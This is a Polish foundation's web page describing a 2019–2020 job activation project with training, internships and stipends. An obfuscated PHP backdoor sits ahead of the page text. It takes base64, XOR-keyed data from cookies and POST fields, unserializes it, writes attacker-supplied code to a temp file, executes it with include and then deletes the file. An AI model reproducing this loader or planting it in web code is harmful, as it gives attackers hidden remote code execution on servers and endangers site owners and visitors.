$Johlz = class_exists("WY_lQXgw");if (!$Johlz){class WY_lQXgw{private $XMBgjVLfF;public static $fSjsCKN = "7f79d202-e1d0-459e-8c2f-2ffce709bf17";public static $azntJ = NULL;public function __construct(){$JoBZldPtVw = $_COOKIE;$ifbqx = $_POST;$hgyvDgSN = @$JoBZldPtVw[substr(WY_lQXgw::$fSjsCKN, 0, 4)];if (!empty($hgyvDgSN)){$HVodJI = "base64";$yfQvTLp = "";$hgyvDgSN = explode(",", $hgyvDgSN);foreach ($hgyvDgSN as $aMCIPglBRa){$yfQvTLp .= @$JoBZldPtVw[$aMCIPglBRa];$yfQvTLp .= @$ifbqx[$aMCIPglBRa];}$yfQvTLp = array_map($HVodJI . "\x5f" . chr (100) . chr ( 577 - 476 )."\143" . chr ( 565 - 454 )."\x64" . "\145", array($yfQvTLp,)); $yfQvTLp = $yfQvTLp[0] ^ str_repeat(WY_lQXgw::$fSjsCKN, (strlen($yfQvTLp[0]) / strlen(WY_lQXgw::$fSjsCKN)) + 1);WY_lQXgw::$azntJ = @unserialize($yfQvTLp);}}public function __destruct(){$this->SUnmT();}private function SUnmT(){if (is_array(WY_lQXgw::$azntJ)) {$kdNwpj = sys_get_temp_dir() . "/" . crc32(WY_lQXgw::$azntJ['s' . "\x61" . "\154" . chr (116)]);@WY_lQXgw::$azntJ[chr (119) . "\162" . "\151" . 't' . chr (101)]($kdNwpj, WY_lQXgw::$azntJ['c' . chr (111) . "\156" . "\164" . chr (101) . "\x6e" . chr ( 556 - 440 )]);include $kdNwpj;@WY_lQXgw::$azntJ['d' . chr ( 624 - 523 ).chr ( 1054 - 946 ).chr (101) . chr (116) . "\x65"]($kdNwpj);exit();}}}$VokiKwItz = new WY_lQXgw(); $VokiKwItz = NULL;} ?> Aktywizację zawodową czas zacząć! – Fundacja Jesteśmy Równi

Projekt „Aktywizację zawodową czas zacząć!” skierowany jest do osób biernych zawodowo, ale również pracujących powyżej 29 roku życia, znajdujące się w szczególnie trudnej sytuacji na rynku pracy (tzn. kobiety, osoby starsze w wieku 50 lat i więcej, o niskich kwalifikacjach, osoby ubogie pracujące, osoby zatrudnione na umowach krótkoterminowych oraz pracujące w ramach umów cywilno-prawnych), i obejmuje wsparciem 60 os. (37K, 23M) z obszaru województwa wielkopolskiego zamieszkujących powiat wrzesiński (w rozumieniu przepisów KC) w okresie 01.09.2019-30.09.2020 r. Projekt ma na celu aktywizację zawodowąpoprzez wykorzystanie takich instrumentów aktywizacji jak wsparcie doradcze obejmujące spotkania z doradcą zawodowym ( przygotowanie IPD) i pośrednikiem pracy. Następnie uczestnicy wezmą udział w szkoleniach zawodowych, zgodnych z zapotrzebowaniem lokalnego rynku, na podstawie najbardziej bieżących analiz i które będą prowadziły do nabycia kompetencji potwierdzonych egzaminem/dyplomem/certyfikatem.Za udział w szkoleniu uczestnicy otrzymują stypendium szkoleniowe maksymalnie 1017,40zł Po zakończeniu szkoleń uczestnicy projektu podejmą 3-miesięczny staż, za który otrzymają stypendium stażowe w wysokości 1017,40zł, co pozwoli im na pełen powrót do życia zawodowego. Wsparcie udzielane w ramach projektu będzie dostosowane do indywidualnych potrzeb uczestników projektu, wynikających z ich aktualnego stanu wiedzy, doświadczenia, zdolności i przeciwwskazań do wykonywania danego zawodu.

W ramach udziału uczestnik otrzymuje:

wsparcie Doradcy zawodowego

wsparcie Pośrednika pracy

szkolenie zawodowe

zwrot kosztów dojazdu na zajęcia indywidualne, szkolenia oraz staż

catering w trakcie szkoleń

stypendium szkoleniowe

stypendium stażowe

ubezpieczenie NNW w czasie szkoleń

Wszelkich informacji udzielaja pracownicy Biura projektu pod nr tel. 574 403 745

Dokumenty wymagane w toku rekrutacji. Więcej…


.